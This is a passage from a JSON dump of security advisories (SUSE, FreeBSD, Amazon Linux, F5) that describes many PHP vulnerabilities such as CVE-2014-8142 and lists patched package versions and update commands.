retrieve keys, which allowed\n remote attackers to cause a denial of service (NULL pointer dereference,\n type confusion, and application crash) or possibly execute arbitrary\n code via crafted serialized data representing a numerically indexed\n _cookies array, related to the SoapClient::__call method in\n ext/soap/soap.c (bsc#973351).\n - CVE-2016-3141: Use-after-free vulnerability in wddx.c in the WDDX\n extension in PHP allowed remote attackers to cause a denial of service\n (memory corruption and application crash) or possibly have unspecified\n other impact by triggering a wddx_deserialize call on XML data\n containing a crafted var element (bsc#969821).\n - CVE-2016-3142: The phar_parse_zipfile function in zip.c in the PHAR\n extension in PHP allowed remote attackers to obtain sensitive\n information from process memory or cause a denial of service\n (out-of-bounds read and application crash) by placing a PK\\x05\\x06\n signature at an invalid location (bsc#971912).\n - CVE-2014-9767: Directory traversal vulnerability in the\n ZipArchive::extractTo function in ext/zip/php_zip.c in PHP\n ext/zip/ext_zip.cpp in HHVM allowed remote attackers to create arbitrary\n empty directories via a crafted ZIP archive (bsc#971612).\n - CVE-2016-3185: The make_http_soap_request function in\n ext/soap/php_http.c in PHP allowed remote attackers to obtain sensitive\n information from process memory or cause a denial of service (type\n confusion and application crash) via crafted serialized _cookies data,\n related to the SoapClient::__call method in ext/soap/soap.c (bsc#971611).\n - CVE-2016-2554: Stack-based buffer overflow in ext/phar/tar.c in PHP\n allowed remote attackers to cause a denial of service (application\n crash) or possibly have unspecified other impact via a crafted TAR\n archive (bsc#968284).\n - CVE-2015-7803: The phar_get_entry_data function in ext/phar/util.c in\n PHP allowed remote attackers to cause a denial of service (NULL pointer\n dereference and application crash) via a .phar file with a crafted TAR\n archive entry in which the Link indicator references a file that did not\n exist (bsc#949961).\n - CVE-2015-6831: Multiple use-after-free vulnerabilities in SPL in PHP\n allowed remote attackers to execute arbitrary code via vectors involving\n (1) ArrayObject, (2) SplObjectStorage, and (3) SplDoublyLinkedList,\n which are mishandled during unserialization (bsc#942291).\n - CVE-2015-6833: Directory traversal vulnerability in the PharData class\n in PHP allowed remote attackers to write to arbitrary files via a ..\n (dot dot) in a ZIP archive entry that is mishandled during an extractTo\n call (bsc#942296.\n - CVE-2015-6836: The SoapClient __call method in ext/soap/soap.c in PHP\n did not properly manage headers, which allowed remote attackers to\n execute arbitrary code via crafted serialized data that triggers a "type\n confusion" in the serialize_function_call function (bsc#945428).\n - CVE-2015-6837: The xsl_ext_function_php function in\n ext/xsl/xsltprocessor.c in PHP when libxml2 is used, did not consider\n the possibility of a NULL valuePop return value proceeding with a free\n operation during initial error checking, which allowed remote attackers\n to cause a denial of service (NULL pointer dereference and application\n crash) via a crafted XML document, a different vulnerability than\n CVE-2015-6838 (bsc#945412).\n - CVE-2015-6838: The xsl_ext_function_php function in\n ext/xsl/xsltprocessor.c in PHP when libxml2 is used, did not consider\n the possibility of a NULL valuePop return value proceeding with a free\n operation after the principal argument loop, which allowed remote\n attackers to cause a denial of service (NULL pointer dereference and\n application crash) via a crafted XML document, a different vulnerability\n than CVE-2015-6837 (bsc#945412).\n - CVE-2015-5590: Stack-based buffer overflow in the phar_fix_filepath\n function in ext/phar/phar.c in PHP allowed remote attackers to cause a\n denial of service or possibly have unspecified other impact via a large\n length value, as demonstrated by mishandling of an e-mail attachment by\n the imap PHP extension (bsc#938719).\n - CVE-2015-5589: The phar_convert_to_other function in\n ext/phar/phar_object.c in PHP did not validate a file pointer a close\n operation, which allowed remote attackers to cause a denial of service\n (segmentation fault) or possibly have unspecified other impact via a\n crafted TAR archive that is mishandled in a Phar::convertToData call\n (bsc#938721).\n - CVE-2015-4602: The __PHP_Incomplete_Class function in\n ext/standard/incomplete_class.c in PHP allowed remote attackers to cause\n a denial of service (application crash) or possibly execute arbitrary\n code via an unexpected data type, related to a "type confusion" issue\n (bsc#935224).\n - CVE-2015-4599: The SoapFault::__toString method in ext/soap/soap.c in\n PHP allowed remote attackers to obtain sensitive information, cause a\n denial of service (application crash), or possibly execute arbitrary\n code via an unexpected data type, related to a "type confusion" issue\n (bsc#935226).\n - CVE-2015-4600: The SoapClient implementation in PHP allowed remote\n attackers to cause a denial of service (application crash) or possibly\n execute arbitrary code via an unexpected data type, related to "type\n confusion" issues in the (1) SoapClient::__getLastRequest, (2)\n SoapClient::__getLastResponse, (3) SoapClient::__getLastRequestHeaders,\n (4) SoapClient::__getLastResponseHeaders, (5) SoapClient::__getCookies,\n and (6) SoapClient::__setCookie methods (bsc#935226).\n - CVE-2015-4601: PHP allowed remote attackers to cause a denial of service\n (application crash) or possibly execute arbitrary code via an unexpected\n data type, related to "type confusion" issues in (1)\n ext/soap/php_encoding.c, (2) ext/soap/php_http.c, and (3)\n ext/soap/soap.c, a different issue than CVE-2015-4600 (bsc#935226.\n - CVE-2015-4603: The exception::getTraceAsString function in\n Zend/zend_exceptions.c in PHP allowed remote attackers to execute\n arbitrary code via an unexpected data type, related to a "type\n confusion" issue (bsc#935234).\n - CVE-2015-4644: The php_pgsql_meta_data function in pgsql.c in the\n PostgreSQL (aka pgsql) extension in PHP did not validate token\n extraction for table names, which might allowed remote attackers to\n cause a denial of service (NULL pointer dereference and application\n crash) via a crafted name. NOTE: this vulnerability exists because of an\n incomplete fix for CVE-2015-1352 (bsc#935274).\n - CVE-2015-4643: Integer overflow in the ftp_genlist function in\n ext/ftp/ftp.c in PHP allowed remote FTP servers to execute arbitrary\n code via a long reply to a LIST command, leading to a heap-based buffer\n overflow. NOTE: this vulnerability exists because of an incomplete fix\n for CVE-2015-4022 (bsc#935275).\n - CVE-2015-3411: PHP did not ensure that pathnames lack %00 sequences,\n which might have allowed remote attackers to read or write to arbitrary\n files via crafted input to an application that calls (1) a DOMDocument\n load method, (2) the xmlwriter_open_uri function, (3) the finfo_file\n function, or (4) the hash_hmac_file function, as demonstrated by a\n filename\\0.xml attack that bypasses an intended configuration in which\n client users may read only .xml files (bsc#935227).\n - CVE-2015-3412: PHP did not ensure that pathnames lack %00 sequences,\n which might have allowed remote attackers to read arbitrary files via\n crafted input to an application that calls the\n stream_resolve_include_path function in ext/standard/streamsfuncs.c, as\n demonstrated by a filename\\0.extension attack that bypasses an intended\n configuration in which client users may read files with only one\n specific extension (bsc#935229).\n - CVE-2015-4598: PHP did not ensure that pathnames lack %00 sequences,\n which might have allowed remote attackers to read or write to arbitrary\n files via crafted input to an application that calls (1) a DOMDocument\n save method or (2) the GD imagepsloadfont function, as demonstrated by a\n filename\\0.html attack that bypasses an intended configuration in which\n client users may write to only .html files (bsc#935232).\n - CVE-2015-4148: The do_soap_call function in ext/soap/soap.c in PHP did\n not verify that the uri property is a string, which allowed remote\n attackers to obtain sensitive information by providing crafted\n serialized data with an int data type, related to a "type confusion"\n issue (bsc#933227).\n - CVE-2015-4024: Algorithmic complexity vulnerability in the\n multipart_buffer_headers function in main/rfc1867.c in PHP allowed\n remote attackers to cause a denial of service (CPU consumption) via\n crafted form data that triggers an improper order-of-growth outcome\n (bsc#931421).\n - CVE-2015-4026: The pcntl_exec implementation in PHP truncates a pathname\n upon encountering a \\x00 character, which might allowed remote attackers\n to bypass intended extension restrictions and execute files with\n unexpected names via a crafted first argument. NOTE: this vulnerability\n exists because of an incomplete fix for CVE-2006-7243 (bsc#931776).\n - CVE-2015-4022: Integer overflow in the ftp_genlist function in\n ext/ftp/ftp.c in PHP allowed remote FTP servers to execute arbitrary\n code via a long reply to a LIST command, leading to a heap-based buffer\n overflow (bsc#931772).\n - CVE-2015-4021: The phar_parse_tarfile function in ext/phar/tar.c in PHP\n did not verify that the first character of a filename is different from\n the \\0 character, which allowed remote attackers to cause a denial of\n service (integer underflow and memory corruption) via a crafted entry in\n a tar archive (bsc#931769).\n - CVE-2015-3329: Multiple stack-based buffer overflows in the\n phar_set_inode function in phar_internal.h in PHP allowed remote\n attackers to execute arbitrary code via a crafted length value in a (1)\n tar, (2) phar, or (3) ZIP archive (bsc#928506).\n - CVE-2015-2783: ext/phar/phar.c in PHP allowed remote attackers to obtain\n sensitive information from process memory or cause a denial of service\n (buffer over-read and application crash) via a crafted length value in\n conjunction with crafted serialized data in a phar archive, related to\n the phar_parse_metadata and phar_parse_pharfile functions (bsc#928511).\n - CVE-2015-2787: Use-after-free vulnerability in the process_nested_data\n function in ext/standard/var_unserializer.re in PHP allowed remote\n attackers to execute arbitrary code via a crafted unserialize call that\n leverages use of the unset function within an __wakeup function, a\n related issue to CVE-2015-0231 (bsc#924972).\n - CVE-2014-9709: The GetCode_ function in gd_gif_in.c in GD 2.1.1 and\n earlier, as used in PHP allowed remote attackers to cause a denial of\n service (buffer over-read and application crash) via a crafted GIF image\n that is improperly handled by the gdImageCreateFromGif function\n (bsc#923945).\n - CVE-2015-2301: Use-after-free vulnerability in the phar_rename_archive\n function in phar_object.c in PHP allowed remote attackers to cause a\n denial of service or possibly have unspecified other impact via vectors\n that trigger an attempted renaming of a Phar archive to the name of an\n existing file (bsc#922452).\n - CVE-2015-2305: Integer overflow in the regcomp implementation in the\n Henry Spencer BSD regex library (aka rxspencer) 32-bit platforms might\n have allowed context-dependent attackers to execute arbitrary code via a\n large regular expression that leads to a heap-based buffer overflow\n (bsc#921950).\n - CVE-2014-9705: Heap-based buffer overflow in the\n enchant_broker_request_dict function in ext/enchant/enchant.c in PHP\n allowed remote attackers to execute arbitrary code via vectors that\n trigger creation of multiple dictionaries (bsc#922451).\n - CVE-2015-0273: Multiple use-after-free vulnerabilities in\n ext/date/php_date.c in PHP allowed remote attackers to execute arbitrary\n code via crafted serialized input containing a (1) R or (2) r type\n specifier in (a) DateTimeZone data handled by the\n php_date_timezone_initialize_from_hash function or (b) DateTime data\n handled by the php_date_initialize_from_hash function (bsc#918768).\n - CVE-2014-9652: The mconvert function in softmagic.c in file as used in\n the Fileinfo component in PHP did not properly handle a certain\n string-length field during a copy of a truncated version of a Pascal\n string, which might allowed remote attackers to cause a denial of\n service (out-of-bounds memory access and application crash) via a\n crafted file (bsc#917150).\n - CVE-2014-8142: Use-after-free vulnerability in the process_nested_data\n function in ext/standard/var_unserializer.re in PHP allowed remote\n attackers to execute arbitrary code via a crafted unserialize call that\n leverages improper handling of duplicate keys within the serialized\n properties of an object, a different vulnerability than CVE-2004-1019\n (bsc#910659).\n - CVE-2015-0231: Use-after-free vulnerability in the process_nested_data\n function in ext/standard/var_unserializer.re in PHP allowed remote\n attackers to execute arbitrary code via a crafted unserialize call that\n leverages improper handling of duplicate numerical keys within the\n serialized properties of an object. NOTE: this vulnerability exists\n because of an incomplete fix for CVE-2014-8142 (bsc#910659).\n - CVE-2014-8142: Use-after-free vulnerability in the process_nested_data\n function in ext/standard/var_unserializer.re in PHP allowed remote\n attackers to execute arbitrary code via a crafted unserialize call that\n leverages improper handling of duplicate keys within the serialized\n properties of an object, a different vulnerability than CVE-2004-1019\n (bsc#910659).\n - CVE-2015-0232: The exif_process_unicode function in ext/exif/exif.c in\n PHP allowed remote attackers to execute arbitrary code or cause a denial\n of service (uninitialized pointer free and application crash) via\n crafted EXIF data in a JPEG image (bsc#914690).\n - CVE-2014-3670: The exif_ifd_make_value function in exif.c in the EXIF\n extension in PHP operates on floating-point arrays incorrectly, which\n allowed remote attackers to cause a denial of service (heap memory\n corruption and application crash) or possibly execute arbitrary code via\n a crafted JPEG image with TIFF thumbnail data that is improperly handled\n by the exif_thumbnail function (bsc#902357).\n - CVE-2014-3669: Integer overflow in the object_custom function in\n ext/standard/var_unserializer.c in PHP allowed remote attackers to cause\n a denial of service (application crash) or possibly execute arbitrary\n code via an argument to the unserialize function that triggers\n calculation of a large length value (bsc#902360).\n - CVE-2014-3668: Buffer overflow in the date_from_ISO8601 function in the\n mkgmtime implementation in libxmlrpc/xmlrpc.c in the XMLRPC extension in\n PHP allowed remote attackers to cause a denial of service (application\n crash) via (1) a crafted first argument to the xmlrpc_set_type function\n or (2) a crafted argument to the xmlrpc_decode function, related to an\n out-of-bounds read operation (bsc#902368).\n - CVE-2014-5459: The PEAR_REST class in REST.php in PEAR in PHP allowed\n local users to write to arbitrary files via a symlink attack on a (1)\n rest.cachefile or (2) rest.cacheid file in /tmp/pear/cache/, related to\n the retrieveCacheFirst and useLocalCache functions (bsc#893849).\n - CVE-2014-3597: Multiple buffer overflows in the php_parserr function in\n ext/standard/dns.c in PHP allowed remote DNS servers to cause a denial\n of service (application crash) or possibly execute arbitrary code via a\n crafted DNS record, related to the dns_get_record function and the\n dn_expand function. NOTE: this issue exists because of an incomplete fix\n for CVE-2014-4049 (bsc#893853).\n - CVE-2014-4670: Use-after-free vulnerability in ext/spl/spl_dllist.c in\n the SPL component in PHP allowed context-dependent attackers to cause a\n denial of service or possibly have unspecified other impact via crafted\n iterator usage within applications in certain web-hosting environments\n (bsc#886059).\n - CVE-2014-4698: Use-after-free vulnerability in ext/spl/spl_array.c in\n the SPL component in PHP allowed context-dependent attackers to cause a\n denial of service or possibly have unspecified other impact via crafted\n ArrayIterator usage within applications in certain web-hosting\n environments (bsc#886060).\n - CVE-2014-4721: The phpinfo implementation in ext/standard/info.c in PHP\n did not ensure use of the string data type for the PHP_AUTH_PW,\n PHP_AUTH_TYPE, PHP_AUTH_USER, and PHP_SELF variables, which might\n allowed context-dependent attackers to obtain sensitive information from\n process memory by using the integer data type with crafted values,\n related to a "type confusion" vulnerability, as demonstrated by reading\n a private SSL key in an Apache HTTP Server web-hosting environment with\n mod_ssl and a PHP 5.3.x mod_php (bsc#885961).\n - CVE-2014-0207: The cdf_read_short_sector function in cdf.c in file as\n used in the Fileinfo component in PHP allowed remote attackers to cause\n a denial of service (assertion failure and application exit) via a\n crafted CDF file (bsc#884986).\n - CVE-2014-3478: Buffer overflow in the mconvert function in softmagic.c\n in file as used in the Fileinfo component in PHP allowed remote\n attackers to cause a denial of service (application crash) via a crafted\n Pascal string in a FILE_PSTRING conversion (bsc#884987).\n - CVE-2014-3479: The cdf_check_stream_offset function in cdf.c in file as\n used in the Fileinfo component in PHP relies on incorrect sector-size\n data, which allowed remote attackers to cause a denial of service\n (application crash) via a crafted stream offset in a CDF file\n (bsc#884989).\n - CVE-2014-3480: The cdf_count_chain function in cdf.c in file as used in\n the Fileinfo component in PHP did not properly validate sector-count\n data, which allowed remote attackers to cause a denial of service\n (application crash) via a crafted CDF file (bsc#884990).\n - CVE-2014-3487: The cdf_read_property_info function in file as used in\n the Fileinfo component in PHP did not properly validate a stream offset,\n which allowed remote attackers to cause a denial of service (application\n crash) via a crafted CDF file (bsc#884991).\n - CVE-2014-3515: The SPL component in PHP incorrectly anticipates that\n certain data structures will have the array data type after\n unserialization, which allowed remote attackers to execute arbitrary\n code via a crafted string that triggers use of a Hashtable destructor,\n related to "type confusion" issues in (1) ArrayObject and (2)\n SPLObjectStorage (bsc#884992).\n\n These non-security issues were fixed:\n - bnc#935074: compare with SQL_NULL_DATA correctly\n - bnc#935074: fix segfault in odbc_fetch_array\n - bnc#919080: fix timezone map\n - bnc#925109: unserialize SoapClient type confusion\n\n", "modified": "2016-06-21T13:08:17", "published": "2016-06-21T13:08:17", "id": "SUSE-SU-2016:1638-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2016-06/msg00041.html", "title": "Security update for php53 (important)", "type": "suse", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "freebsd": [{"lastseen": "2019-05-29T18:35:07", "bulletinFamily": "unix", "cvelist": ["CVE-2004-1065", "CVE-2004-1019"], "description": "\nSecunia reports:\n\nMultiple vulnerabilities have been reported in PHP,\n\t which can be exploited to gain escalated privileges,\n\t bypass certain security restrictions, gain knowledge\n\t of sensitive information, or compromise a vulnerable\n\t system.\n\n", "edition": 4, "modified": "2004-12-18T00:00:00", "published": "2004-12-16T00:00:00", "id": "D47E9D19-5016-11D9-9B5F-0050569F0001", "href": "https://vuxml.freebsd.org/freebsd/d47e9d19-5016-11d9-9b5f-0050569f0001.html", "title": "php -- multiple vulnerabilities", "type": "freebsd", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "amazon": [{"lastseen": "2020-11-10T12:36:22", "bulletinFamily": "unix", "cvelist": ["CVE-2014-8142", "CVE-2004-1019"], "description": "**Issue Overview:**\n\nUse-after-free vulnerability in the process_nested_data function in ext/standard/var_unserializer.re in PHP before 5.4.36, 5.5.x before 5.5.20, and 5.6.x before 5.6.4 allows remote attackers to execute arbitrary code via a crafted unserialize call that leverages improper handling of duplicate keys within the serialized properties of an object, a different vulnerability than [CVE-2004-1019 __](<https://access.redhat.com/security/cve/CVE-2004-1019>).\n\n \n**Affected Packages:** \n\n\nphp54\n\n \n**Issue Correction:** \nRun _yum update php54_ to update your system.\n\n \n\n\n**New Packages:**\n \n \n i686: \n php54-bcmath-5.4.36-1.64.amzn1.i686 \n php54-odbc-5.4.36-1.64.amzn1.i686 \n php54-pdo-5.4.36-1.64.amzn1.i686 \n php54-mcrypt-5.4.36-1.64.amzn1.i686 \n php54-pspell-5.4.36-1.64.amzn1.i686 \n php54-snmp-5.4.36-1.64.amzn1.i686 \n php54-xmlrpc-5.4.36-1.64.amzn1.i686 \n php54-debuginfo-5.4.36-1.64.amzn1.i686 \n php54-common-5.4.36-1.64.amzn1.i686 \n php54-devel-5.4.36-1.64.amzn1.i686 \n php54-mssql-5.4.36-1.64.amzn1.i686 \n php54-embedded-5.4.36-1.64.amzn1.i686 \n php54-mbstring-5.4.36-1.64.amzn1.i686 \n php54-cli-5.4.36-1.64.amzn1.i686 \n php54-soap-5.4.36-1.64.amzn1.i686 \n php54-process-5.4.36-1.64.amzn1.i686 \n php54-mysql-5.4.36-1.64.amzn1.i686 \n php54-ldap-5.4.36-1.64.amzn1.i686 \n php54-mysqlnd-5.4.36-1.64.amzn1.i686 \n php54-tidy-5.4.36-1.64.amzn1.i686 \n php54-5.4.36-1.64.amzn1.i686 \n php54-gd-5.4.36-1.64.amzn1.i686 \n php54-xml-5.4.36-1.64.amzn1.i686 \n php54-pgsql-5.4.36-1.64.amzn1.i686 \n php54-recode-5.4.36-1.64.amzn1.i686 \n php54-intl-5.4.36-1.64.amzn1.i686 \n php54-dba-5.4.36-1.64.amzn1.i686 \n php54-enchant-5.4.36-1.64.amzn1.i686 \n php54-imap-5.4.36-1.64.amzn1.i686 \n php54-fpm-5.4.36-1.64.amzn1.i686 \n \n src: \n php54-5.4.36-1.64.amzn1.src \n \n x86_64: \n php54-enchant-5.4.36-1.64.amzn1.x86_64 \n php54-common-5.4.36-1.64.amzn1.x86_64 \n php54-embedded-5.4.36-1.64.amzn1.x86_64 \n php54-debuginfo-5.4.36-1.64.amzn1.x86_64 \n php54-xmlrpc-5.4.36-1.64.amzn1.x86_64 \n php54-process-5.4.36-1.64.amzn1.x86_64 \n php54-gd-5.4.36-1.64.amzn1.x86_64 \n php54-xml-5.4.36-1.64.amzn1.x86_64 \n php54-pdo-5.4.36-1.64.amzn1.x86_64 \n php54-5.4.36-1.64.amzn1.x86_64 \n php54-intl-5.4.36-1.64.amzn1.x86_64 \n php54-cli-5.4.36-1.64.amzn1.x86_64 \n php54-odbc-5.4.36-1.64.amzn1.x86_64 \n php54-mbstring-5.4.36-1.64.amzn1.x86_64 \n php54-imap-5.4.36-1.64.amzn1.x86_64 \n php54-mysql-5.4.36-1.64.amzn1.x86_64 \n php54-snmp-5.4.36-1.64.amzn1.x86_64 \n php54-pgsql-5.4.36-1.64.amzn1.x86_64 \n php54-mcrypt-5.4.36-1.64.amzn1.x86_64 \n php54-soap-5.4.36-1.64.amzn1.x86_64 \n php54-mysqlnd-5.4.36-1.64.amzn1.x86_64 \n php54-devel-5.4.36-1.64.amzn1.x86_64 \n php54-tidy-5.4.36-1.64.amzn1.x86_64 \n php54-pspell-5.4.36-1.64.amzn1.x86_64 \n php54-mssql-5.4.36-1.64.amzn1.x86_64 \n php54-bcmath-5.4.36-1.64.amzn1.x86_64 \n php54-recode-5.4.36-1.64.amzn1.x86_64 \n php54-fpm-5.4.36-1.64.amzn1.x86_64 \n php54-ldap-5.4.36-1.64.amzn1.x86_64 \n php54-dba-5.4.36-1.64.amzn1.x86_64 \n \n \n", "edition": 4, "modified": "2015-01-08T11:35:00", "published": "2015-01-08T11:35:00", "id": "ALAS-2015-463", "href": "https://alas.aws.amazon.com/ALAS-2015-463.html", "title": "Medium: php54", "type": "amazon", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-11-10T12:37:04", "bulletinFamily": "unix", "cvelist": ["CVE-2014-8142", "CVE-2004-1019"], "description": "**Issue Overview:**\n\nUse-after-free vulnerability in the process_nested_data function in ext/standard/var_unserializer.re in PHP before 5.4.36, 5.5.x before 5.5.20, and 5.6.x before 5.6.4 allows remote attackers to execute arbitrary code via a crafted unserialize call that leverages improper handling of duplicate keys within the serialized properties of an object, a different vulnerability than [CVE-2004-1019 __](<https://access.redhat.com/security/cve/CVE-2004-1019>).\n\n \n**Affected Packages:** \n\n\nphp55\n\n \n**Issue Correction:** \nRun _yum update php55_ to update your system.\n\n \n\n\n**New Packages:**\n \n \n i686: \n php55-xmlrpc-5.5.20-2.94.amzn1.i686 \n php55-embedded-5.5.20-2.94.amzn1.i686 \n php55-dba-5.5.20-2.94.amzn1.i686 \n php55-pgsql-5.5.20-2.94.amzn1.i686 \n php55-gmp-5.5.20-2.94.amzn1.i686 \n php55-enchant-5.5.20-2.94.amzn1.i686 \n php55-soap-5.5.20-2.94.amzn1.i686 \n php55-mbstring-5.5.20-2.94.amzn1.i686 \n php55-ldap-5.5.20-2.94.amzn1.i686 \n php55-common-5.5.20-2.94.amzn1.i686 \n php55-intl-5.5.20-2.94.amzn1.i686 \n php55-imap-5.5.20-2.94.amzn1.i686 \n php55-pdo-5.5.20-2.94.amzn1.i686 \n php55-mysqlnd-5.5.20-2.94.amzn1.i686 \n php55-debuginfo-5.5.20-2.94.amzn1.i686 \n php55-pspell-5.5.20-2.94.amzn1.i686 \n php55-opcache-5.5.20-2.94.amzn1.i686 \n php55-gd-5.5.20-2.94.amzn1.i686 \n php55-recode-5.5.20-2.94.amzn1.i686 \n php55-process-5.5.20-2.94.amzn1.i686 \n php55-cli-5.5.20-2.94.amzn1.i686 \n php55-devel-5.5.20-2.94.amzn1.i686 \n php55-xml-5.5.20-2.94.amzn1.i686 \n php55-tidy-5.5.20-2.94.amzn1.i686 \n php55-mcrypt-5.5.20-2.94.amzn1.i686 \n php55-snmp-5.5.20-2.94.amzn1.i686 \n php55-mssql-5.5.20-2.94.amzn1.i686 \n php55-fpm-5.5.20-2.94.amzn1.i686 \n php55-odbc-5.5.20-2.94.amzn1.i686 \n php55-bcmath-5.5.20-2.94.amzn1.i686 \n php55-5.5.20-2.94.amzn1.i686 \n \n src: \n php55-5.5.20-2.94.amzn1.src \n \n x86_64: \n php55-process-5.5.20-2.94.amzn1.x86_64 \n php55-enchant-5.5.20-2.94.amzn1.x86_64 \n php55-xmlrpc-5.5.20-2.94.amzn1.x86_64 \n php55-pspell-5.5.20-2.94.amzn1.x86_64 \n php55-pdo-5.5.20-2.94.amzn1.x86_64 \n php55-pgsql-5.5.20-2.94.amzn1.x86_64 \n php55-fpm-5.5.20-2.94.amzn1.x86_64 \n php55-xml-5.5.20-2.94.amzn1.x86_64 \n php55-odbc-5.5.20-2.94.amzn1.x86_64 \n php55-cli-5.5.20-2.94.amzn1.x86_64 \n php55-tidy-5.5.20-2.94.amzn1.x86_64 \n php55-soap-5.5.20-2.94.amzn1.x86_64 \n php55-opcache-5.5.20-2.94.amzn1.x86_64 \n php55-snmp-5.5.20-2.94.amzn1.x86_64 \n php55-mysqlnd-5.5.20-2.94.amzn1.x86_64 \n php55-gd-5.5.20-2.94.amzn1.x86_64 \n php55-bcmath-5.5.20-2.94.amzn1.x86_64 \n php55-common-5.5.20-2.94.amzn1.x86_64 \n php55-devel-5.5.20-2.94.amzn1.x86_64 \n php55-recode-5.5.20-2.94.amzn1.x86_64 \n php55-mbstring-5.5.20-2.94.amzn1.x86_64 \n php55-gmp-5.5.20-2.94.amzn1.x86_64 \n php55-mcrypt-5.5.20-2.94.amzn1.x86_64 \n php55-intl-5.5.20-2.94.amzn1.x86_64 \n php55-dba-5.5.20-2.94.amzn1.x86_64 \n php55-ldap-5.5.20-2.94.amzn1.x86_64 \n php55-imap-5.5.20-2.94.amzn1.x86_64 \n php55-5.5.20-2.94.amzn1.x86_64 \n php55-debuginfo-5.5.20-2.94.amzn1.x86_64 \n php55-embedded-5.5.20-2.94.amzn1.x86_64 \n php55-mssql-5.5.20-2.94.amzn1.x86_64 \n \n \n", "edition": 4, "modified": "2015-01-08T11:35:00", "published": "2015-01-08T11:35:00", "id": "ALAS-2015-464", "href": "https://alas.aws.amazon.com/ALAS-2015-464.html", "title": "Medium: php55", "type": "amazon", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "f5": [{"lastseen": "2017-10-12T02:11:04", "bulletinFamily": "software", "cvelist": ["CVE-2014-8142", "CVE-2004-1019"], "edition": 1, "description": " \n\n\nUse-after-free vulnerability in the process_nested_data function in ext/standard/var_unserializer.re in PHP before 5.4.36, 5.5.x before 5.5.20, and 5.6.x before 5.6.4 allows remote attackers to execute arbitrary code via a crafted unserialize call that leverages improper handling of duplicate keys within the serialized properties of an object, a different vulnerability than CVE-2004-1019. ([CVE-2014-8142](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8142>))\n\nImpact \n\n\nNone. F5 products are not affected by this vulnerability. \n\n\nNone\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n * [K167: Downloading software and firmware from F5](<https://support.f5.com/csp/article/K167>)\n", "modified": "2016-01-09T02:20:00", "published": "2015-01-22T21:25:00", "href": "https://support.f5.com/csp/article/K16021", "id": "F5:K16021", "title": "PHP vulnerability CVE-2014-8142", "type": "f5", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-11-09T00:09:56", "bulletinFamily": "software", "cvelist": ["CVE-2014-8142", "CVE-2004-1019"], "edition": 1, "description": "Recommended Action\n\nNone\n\nSupplemental Information\n\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents\n * SOL4602: Overview of the F5 security vulnerability response policy\n * SOL4918: Overview of the F5 critical issue hotfix policy\n * SOL167: Downloading software and firmware from F5\n", "modified": "2015-01-22T00:00:00", "published": "2015-01-22T00:00:00", "href": "http://support.f5.com/kb/en-us/solutions/public/16000/000/sol16021.html", "id": "SOL16021", "title": "SOL16021 - PHP vulnerability CVE-2014-8142", "type": "f5", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}
